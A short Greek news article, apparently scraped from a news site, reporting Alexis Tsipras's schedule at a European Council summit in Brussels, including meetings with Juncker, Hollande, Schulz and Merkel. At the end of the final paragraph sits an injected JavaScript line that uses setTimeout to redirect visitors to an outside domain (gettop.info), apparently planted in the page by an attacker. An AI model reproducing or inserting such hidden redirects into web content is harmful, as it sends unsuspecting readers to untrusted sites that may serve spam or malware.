Στις Βρυξέλλες ο Αλ. Τσίπρας για τη Σύνοδο Κορυφής-Τετ α τετ με Γιούνκερ, Ολάντ, Μέρκελ και Σουλτς

0
6

 

Ο Πρωθυπουργός Αλέξης Τσίπρας, αναχώρησε για τις Βρυξέλλες, όπου θα συμμετάσχει στις εργασίες της Συνόδου του Ευρωπαϊκού Συμβουλίου, ενώ θα πραγματοποιήσει και σειρά κρίσιμων διμερών συναντήσεων.

Η πρώτη θα είναι με τον Πρόεδρο της Κυπριακής Δημοκρατίας, Νίκο Αναστασιάδη στις 9:30 το βράδυ (τοπική ώρα).

Την Πέμπτη 20 Οκτωβρίου, ο Πρωθυπουργός – σε ώρες που αναμένεται να καθοριστούν – θα συναντηθεί με τον Πρόεδρο της Ευρωπαϊκής Επιτροπής Ζαν Κλοντ Γιούνκερ, τον Πρόεδρο της Γαλλίας, Φρανσουά Ολάντ και τον Πρόεδρο του Ευρωπαϊκού Κοινοβουλίου, Μάρτιν Σουλτς.

Στις 4 το απόγευμα, ο κ. Τσίπρας θα προσέλθει στο Ευρωπαϊκό Συμβούλιο και μία ώρα αργότερα θα πραγματοποιηθεί «Ανταλλαγή απόψεων των Ηγετών με τον Πρόεδρο του Ευρωπαϊκού Κοινοβουλίου, Μάρτιν Σουλτς».

Ακολουθεί, στις 5:30 το απόγευμα, η «Οικογενειακή Φωτογραφία» και στις 5:45 θα συνέλθει η πρώτη συνεδρία εργασιών του Ευρωπαϊκού Συμβουλίου. Αργότερα θα δοθεί δείπνο εργασίας.

Την Παρασκευή 21 Οκτωβρίου, ο Πρωθυπουργός θα βρίσκεται στο Ευρωπαϊκό Συμβούλιο στις 9:15, στις 9:30 θα έχει διμερή συνάντηση με την Καγκελάριο της Γερμανίας, Άνγκελα Μέρκελ, ενώ η δεύτερη συνεδρία των εργασιών του Ευρωπαϊκού Συμβουλίου θα συνέλθει στις 10:00. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here